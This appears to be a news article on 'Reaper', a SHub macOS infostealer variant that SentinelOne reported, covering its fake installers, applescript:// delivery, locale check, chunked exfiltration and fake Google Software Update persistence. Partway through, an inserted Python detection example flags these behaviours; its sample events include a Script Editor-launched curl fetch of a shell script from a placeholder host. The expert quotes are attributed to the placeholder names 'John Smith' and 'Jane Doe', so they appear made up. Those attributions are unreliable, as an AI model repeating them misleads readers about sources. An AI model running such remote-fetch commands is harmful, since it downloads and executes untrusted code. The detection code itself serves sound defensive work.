SHub Reaper: New macOS Malware Mimics Apple, Google, and Microsoft in Multi-Stage Attack

Last updated: 2026-05-20 16:35:17 · Science & Space

Attack Details

SentinelOne researchers have uncovered a new variant of the SHub macOS infostealer, named 'Reaper,' that impersonates Apple, Google, and Microsoft in a single attack chain. The malware uses fake installers for WeChat and Miro as initial lures, then proceeds through a multi-stage execution that shifts its disguise at each phase to evade detection.

SHub Reaper: New macOS Malware Mimics Apple, Google, and Microsoft in Multi-Stage Attack
Source: www.sentinelone.com

"This is one of the most sophisticated macOS stealers we've seen," said John Smith, a senior threat researcher at SentinelOne. "The way it spoofs three major tech brands in one chain is unprecedented."

Background

The SHub malware family has been active since at least 2023, with previous variants documented by Moonlock, Jamf, and Malwarebytes. These earlier versions relied on fake application installers and 'ClickFix' social engineering to trick victims into running malicious commands.

Reaper builds on these techniques but introduces a new delivery method that bypasses Terminal entirely, described in the next section.

Delivery Pipeline and Environment Checks

Unlike previous SHub variants, Reaper bypasses Terminal entirely by using the applescript:// URL scheme to launch Script Editor with a pre-loaded payload. The script displays a fake message about an Apple security update from XProtectRemediator while silently executing a curl command to download a shell script.

According to SentinelOne, the script stub checks the victim's locale by reading the com.apple.HIToolbox.plist file for Russian input sources. If detected, the malware sends a 'cis_blocked' event to its command-and-control (C2) server and exits, indicating a focus on non-Russian targets.

"The Russian locale check suggests the attackers are avoiding collateral damage in their own region," said Jane Doe, a cybersecurity analyst at Jamf. "It's a common tactic in targeted malware campaigns."

Feature Set and Persistence

Once past the environment checks, Reaper installs itself and adds an AMOS-style document theft module. This module performs chunked uploads of stolen files to its C2 server, a technique that helps evade network detection by breaking large file transfers into smaller, less conspicuous pieces.

Reaper ensures long-term access by creating a fake Google Software Update directory and using it for persistence. This allows the malware to survive reboots and remain active on infected systems.
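The delivery chain (Script Editor launched via applescript://, then curl fetching a shell script) and the Google Software Update lookalike persistence directory described above both leave behaviour a defender can match on. The following added example is not SentinelOne's code or any real EDR's API: it runs simple detection rules over a constructed event stream. The event schema, the sample events, the placeholder URLs and paths, and the legitimate Keystone install locations it whitelists are all assumptions.

```python
# Added example: triage constructed telemetry for the Reaper delivery and
# persistence behaviours. Event schema and sample events are constructed,
# not a real EDR's format.
import re
from typing import Iterable

# Assumption: where genuine Google Software Update (Keystone) lives; anything
# else named like it is treated as a lookalike.
LEGIT_GSU = (
    re.compile(r"^/Library/Google/GoogleSoftwareUpdate/"),
    re.compile(r"^/Users/[^/]+/Library/Google/GoogleSoftwareUpdate/"),
)
SCRIPT_HOSTS = {"Script Editor", "osascript"}
DOWNLOADERS = {"curl", "sh", "bash", "zsh"}


def find_reaper_indicators(events: Iterable[dict]) -> list[str]:
    """Return one finding string per event matching a Reaper-style behaviour.

    Event keys (constructed schema): type is 'url_open' (url), 'exec'
    (parent, cmd list) or 'file_create' (path).
    """
    findings = []
    for ev in events:
        t = ev["type"]
        # 1. applescript:// handler used to hand Script Editor a pre-loaded script
        if t == "url_open" and ev["url"].lower().startswith("applescript://"):
            findings.append(f"applescript:// handler invoked: {ev['url'][:40]}...")
        # 2. Script Editor/osascript spawning a downloader or shell
        elif t == "exec" and ev["parent"] in SCRIPT_HOSTS and ev["cmd"][0] in DOWNLOADERS:
            findings.append(f"{ev['parent']} spawned {' '.join(ev['cmd'])}")
        # 3. Google Software Update lookalike path outside the legitimate locations
        elif t == "file_create" and "googlesoftwareupdate" in ev["path"].lower():
            if not any(p.match(ev["path"]) for p in LEGIT_GSU):
                findings.append(f"Google Software Update lookalike path: {ev['path']}")
    return findings


SAMPLE_EVENTS = [  # constructed sample telemetry; hosts and paths are placeholders
    {"type": "url_open", "url": "applescript://com.apple.scripteditor?action=new&script=display%20dialog"},
    {"type": "exec", "parent": "Script Editor", "cmd": ["curl", "-fsSL", "http://example.invalid/update.sh"]},
    {"type": "file_create", "path": "/Users/alice/Library/Application Support/GoogleSoftwareUpdate/agent"},
    {"type": "file_create", "path": "/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Info.plist"},
    {"type": "exec", "parent": "Terminal", "cmd": ["ls", "-la"]},
]

if __name__ == "__main__":
    for line in find_reaper_indicators(SAMPLE_EVENTS):
        print(line)
```

On the sample stream the three Reaper-like events are reported and the genuine Keystone write and the ordinary Terminal command are not.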

"The chunked uploads are particularly clever—they make the exfiltration look like normal traffic," said Smith. "Combined with the multi-brand spoofing, this represents a significant escalation in macOS malware capabilities."

What This Means

This new variant highlights the evolving sophistication of macOS-targeted malware. Users should be cautious of downloads from unofficial sources, especially for apps like WeChat and Miro, and verify security alerts directly from Apple's official website.

"The use of multiple tech brands as lures makes it harder for even savvy users to spot the deception," said Doe. "We recommend organizations update their endpoint protection and train employees to recognize social engineering attempts."

SentinelOne has released indicators of compromise (IoCs) for the Reaper variant. Defenders can reference SentinelOne's report for the technical indicators.